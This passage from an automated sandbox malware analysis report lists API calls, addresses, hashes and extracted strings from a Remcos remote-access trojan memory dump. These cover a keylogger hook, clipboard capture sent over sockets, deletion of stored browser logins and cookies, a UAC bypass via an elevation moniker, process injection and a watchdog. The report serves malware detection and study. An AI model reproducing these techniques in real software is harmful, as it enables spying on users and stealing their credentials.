                                                                            • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                            • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                          • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                          • API String ID: 65172268-860466531
                                                                          • Opcode ID: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                                          • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                          • Opcode Fuzzy Hash: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                                          • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                          • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                          • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$CloseFile$FirstNext
                                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                          • API String ID: 1164774033-3681987949
                                                                          • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                          • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                          • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                          • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                          • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                          • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                          • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$Close$File$FirstNext
                                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                          • API String ID: 3527384056-432212279
                                                                          • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                          • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                          • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                          • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                          • API String ID: 726551946-3025026198
                                                                          • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                          • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                          • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                          • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                          APIs
                                                                          • OpenClipboard.USER32 ref: 004159C7
                                                                          • EmptyClipboard.USER32 ref: 004159D5
                                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                          • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                          • CloseClipboard.USER32 ref: 00415A5A
                                                                          • OpenClipboard.USER32 ref: 00415A61
                                                                          • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                          • CloseClipboard.USER32 ref: 00415A89
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                          • String ID:
                                                                          • API String ID: 3520204547-0
                                                                          • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                          • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                          • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                          • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0$1$2$3$4$5$6$7
                                                                          • API String ID: 0-3177665633
                                                                          • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                          • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                          • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                          • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 00409B3F
                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                          • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                          • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                          • GetKeyboardState.USER32(?), ref: 00409B67
                                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                          • String ID: 8[G
                                                                          • API String ID: 1888522110-1691237782
                                                                          • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                          • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                          • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                          • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00406788
                                                                          • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object_wcslen
                                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                          • API String ID: 240030777-3166923314
                                                                          • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                          • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                          • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                          • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                          APIs
                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                          • GetLastError.KERNEL32 ref: 00419935
                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                          • String ID:
                                                                          • API String ID: 3587775597-0
                                                                          • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                                          • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                          • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                                          • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                          • String ID:
                                                                          • API String ID: 2341273852-0
                                                                          • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                                          • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                          • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                                          • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Find$CreateFirstNext
                                                                          • String ID: @CG$XCG$`HG$`HG$>G
                                                                          • API String ID: 341183262-3780268858
                                                                          • Opcode ID: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                                          • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                          • Opcode Fuzzy Hash: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                                          • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                          • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                          • GetLastError.KERNEL32 ref: 00409A1B
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                          • TranslateMessage.USER32(?), ref: 00409A7A
                                                                          • DispatchMessageA.USER32(?), ref: 00409A85
                                                                          Strings
                                                                          • Keylogger initialization failure: error , xrefs: 00409A32
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                          • String ID: Keylogger initialization failure: error
                                                                          • API String ID: 3219506041-952744263
                                                                          • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                          • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                          • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                                          • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                          APIs
                                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                          • API String ID: 2127411465-314212984
                                                                          • Opcode ID: 7731d094eaf1024ebf2e5acd9dd76e2b4cfa910057502a58f3d6e083125bf1ba
                                                                          • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                          • Opcode Fuzzy Hash: 7731d094eaf1024ebf2e5acd9dd76e2b4cfa910057502a58f3d6e083125bf1ba
                                                                          • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                          APIs
                                                                            • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                            • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                            • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                          • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                          • ExitProcess.KERNEL32 ref: 0040E672
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                                          • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                          • API String ID: 2281282204-3981147832
                                                                          • Opcode ID: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                                          • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                          • Opcode Fuzzy Hash: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                                          • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                          APIs
                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                          • GetLastError.KERNEL32 ref: 0040B261
                                                                          Strings
                                                                          • UserProfile, xrefs: 0040B227
                                                                          • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteErrorFileLast
                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                          • API String ID: 2018770650-1062637481
                                                                          • Opcode ID: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                                          • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                          • Opcode Fuzzy Hash: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                                          • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                          • GetLastError.KERNEL32 ref: 00416B02
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 3534403312-3733053543
                                                                          • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                          • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                          • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                          • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 004089AE
                                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                            • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                            • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                            • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                          • String ID:
                                                                          • API String ID: 4043647387-0
                                                                          • Opcode ID: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                                          • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                          • Opcode Fuzzy Hash: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                                          • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                          APIs
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                                          • String ID:
                                                                          • API String ID: 276877138-0
                                                                          • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                          • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                          • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                          • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                          APIs
                                                                            • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                            • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                            • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                            • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                            • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
